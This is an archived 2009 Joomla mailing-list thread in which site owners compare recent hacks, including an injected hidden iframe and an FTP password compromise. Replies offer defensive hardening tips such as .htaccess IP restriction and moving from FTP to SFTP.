[joomla] several 1.0 sites hacked this week!
Barrie North
barrie at compassdesigns.net
Thu Mar 26 20:47:57 EDT 2009
But why are you using javascript for your menus... ;)
/runs to twitter
Barrie North
~Fully Managed Joomla Sites~
www.simplweb.com/joomla
~Join the Community at compassdesigns.net~
www.compassdesigns.net/join-the-community.html
On Thu, Mar 26, 2009 at 8:40 PM, Mitch Pirtle <mitch.pirtle at gmail.com>wrote:
> This information is unfortunately too late for Barrie, but I have
> found vsftpd (Very Secure FTP Daemon) not only secure but wikkid fast
> to boot. It supports SFTP, so folks that don't have SSH/SCP can still
> use a half-decent client and run over a moderately encrypted
> connection.
>
> As for the defense of folks running PHP4, mass shared hosting, and
> whatnot... I just made an off-hand comment a few seconds ago regarding
> folks using outdated javascript menus that search bots could not
> parse:
>
> "If you're not keeping up with the times, don't expect your website to
> perform well."
>
> I cannot stress that enough. Seriously. Don't take your horse and cart
> on the information superhighway; and if that is all you can afford,
> perhaps you need to save up before you take that first ride, and for
> certain stay well away from the fast lane. Just like starting a
> business - if you cannot pony up the funds required to incorporate a
> legitimate entity, don't expected to be treated like a legitimate
> entity!
>
> I know it may sound harsh, maybe I'm just grumpy from working too many
> hours.
>
> -- Mitch, grumpy from working too many hours
>
> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
> > We found the attacks/IP in the server logs. A financially backed hacker
> > outfit from Nigeria, go figure. The joys of having a PR9 site =P
> >
> > Our password was 10 chars including letters, numbers and punctuation. We
> are
> > hosted on a "secured" rackspace server.
> >
> > We don't have FTP running any more!
> >
> > Barrie North
> > ~Fully Managed Joomla Sites~
> > www.simplweb.com/joomla
> > ~Join the Community at compassdesigns.net~
> > www.compassdesigns.net/join-the-community.html
> >
> >
> > On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirjavid at gmail.com> wrote:
> >>
> >> Hello Barrie,
> >>
> >> May I inquire as to how you verified the attack? I know that FTP
> >> bruteforcing is extremely difficult, and that is very improbable.
> >> What you may have faced was a dictionary attack, which may have worked
> >> with some luck if you had a weak password. A password including a mix
> >> of
> >>
> >> 1) UPPERCASE
> >> 2) lowercase
> >> 3) punctuation/!#$.,
> >> 4) numbers
> >>
> >> and have a good strong/long password you would never fall victim to
> >> dictionary.
> >>
> >> As for bruteforce, an ftpd simply denies access after 3 or 5
> >> (configurable, usually defaults to 3) failed login attempts for some
> >> time. Some hosts go as far as restricting ftp access until you call
> >> them and verify the problem. Also, brute forcing over a TCP pipe a
> >> slow protocol such as FTP is virtually impossible. At this rate it
> >> would take YEARS to bruteforce the password if not DECADES.
> >>
> >> @ Other users
> >> Also make sure to go into joomla user configuration and change the
> >> username of 'admin' to something else.
> >> To protect your joomla administation section If you have a static ip,
> >> you can add
> >>
> >> order allow,deny
> >> deny from all
> >> allow from your.static.ip.here
> >>
> >> to a file called .htaccess in your administration folder. If for some
> >> reason your ip changes and you get locked out, simply login via FTP
> >> and update the .htaccess file. There are some other advanced methods
> >> for protecting your administration folder.
> >>
> >> Also, FTP was a protocol developed 30+ years ago. It is not secure,
> >> clear text authentication, etc. FTP must go. If you can help it, do
> >> not use ftp, instead SFTP, or SSH. Just.. anything but FTP. Sadly,
> >> thats all that is easy to use, highly available across all hosts, and
> >> not everyone on shared hosting provides SSH access. If you can do
> >> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
> >>
> >> I have seen more sites hacked due to unpatched php or bad php
> >> code(mostly from 3rd party addons) more than I have with FTP though.
> >>
> >> Still with good security practices you can reduce the risk considerably.
> >>
> >> Peace.
> >>
> >>
> >>
> >>
> >> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
> >> > We got hacked last month by a brute force attack on our FTP password.
> >> > Once
> >> > they had that, they got into the Joomla files.
> >> >
> >> > Any site can be hacked. The other half of the equation is vigilance
> and
> >> > backups :)
> >> >
> >> > Barrie North
> >> > ~Fully Managed Joomla Sites~
> >> > www.simplweb.com/joomla
> >> > ~Join the Community at compassdesigns.net~
> >> > www.compassdesigns.net/join-the-community.html
> >> >
> >> >
> >> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masimko at verizon.net>
> >> > wrote:
> >> >>
> >> >> Several of my clients' 1.0.15 sites have been hacked this week! Is
> >> >> there a problem with 1.0?
> >> >>
> >> >> I don't see an announcement on joomla.org
> >> >>
> >> >> I just saw that my site was hacked the other day. Fortunately they
> >> >> bunged it up a bit, so the code didn't run, but instead gave an error
> >> >> message.
> >> >>
> >> >> What they had done is append javascript to the index.php file. It was
> >> >> disguised as ascii codes, and there were several var defined and
> >> >> substituted in, but the result was that it attempted to open a hidden
> >> >> iframe directed to siplank.com. When I tried to open siplank.com in
> a
> >> >> web browser (yes, I did that! I do lots of crazy things out of
> >> >> curiosity) Firefox stopped it with a warning about the site being
> known
> >> >> for malware.
> >> >>
> >> >> I'm running 1.5.9 on a shared host. I will be calling my host and
> >> >> asking
> >> >> them what they can find out from their logs as to what happened.
> >> >>
> >> >> _______________________________________________
> >> >> New York PHP SIG: Joomla! Mailing List
> >> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >> >>
> >> >> NYPHPCon 2006 Presentations Online
> >> >> http://www.nyphpcon.com
> >> >>
> >> >> Show Your Participation in New York PHP
> >> >> http://www.nyphp.org/show_participation.php
> >> >
> >> >
> >> > _______________________________________________
> >> > New York PHP SIG: Joomla! Mailing List
> >> > http://lists.nyphp.org/mailman/listinfo/joomla
> >> >
> >> > NYPHPCon 2006 Presentations Online
> >> > http://www.nyphpcon.com
> >> >
> >> > Show Your Participation in New York PHP
> >> > http://www.nyphp.org/show_participation.php
> >> >
> >> _______________________________________________
> >> New York PHP SIG: Joomla! Mailing List
> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >>
> >> NYPHPCon 2006 Presentations Online
> >> http://www.nyphpcon.com
> >>
> >> Show Your Participation in New York PHP
> >> http://www.nyphp.org/show_participation.php
> >
> > _______________________________________________
> > New York PHP SIG: Joomla! Mailing List
> > http://lists.nyphp.org/mailman/listinfo/joomla
> >
> > NYPHPCon 2006 Presentations Online
> > http://www.nyphpcon.com
> >
> > Show Your Participation in New York PHP
> > http://www.nyphp.org/show_participation.php
> >
> _______________________________________________
> New York PHP SIG: Joomla! Mailing List
> http://lists.nyphp.org/mailman/listinfo/joomla
>
> NYPHPCon 2006 Presentations Online
> http://www.nyphpcon.com
>
> Show Your Participation in New York PHP
> http://www.nyphp.org/show_participation.php
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.nyphp.org/pipermail/joomla/attachments/20090326/670bf7c4/attachment.html>
More information about the Joomla
mailing list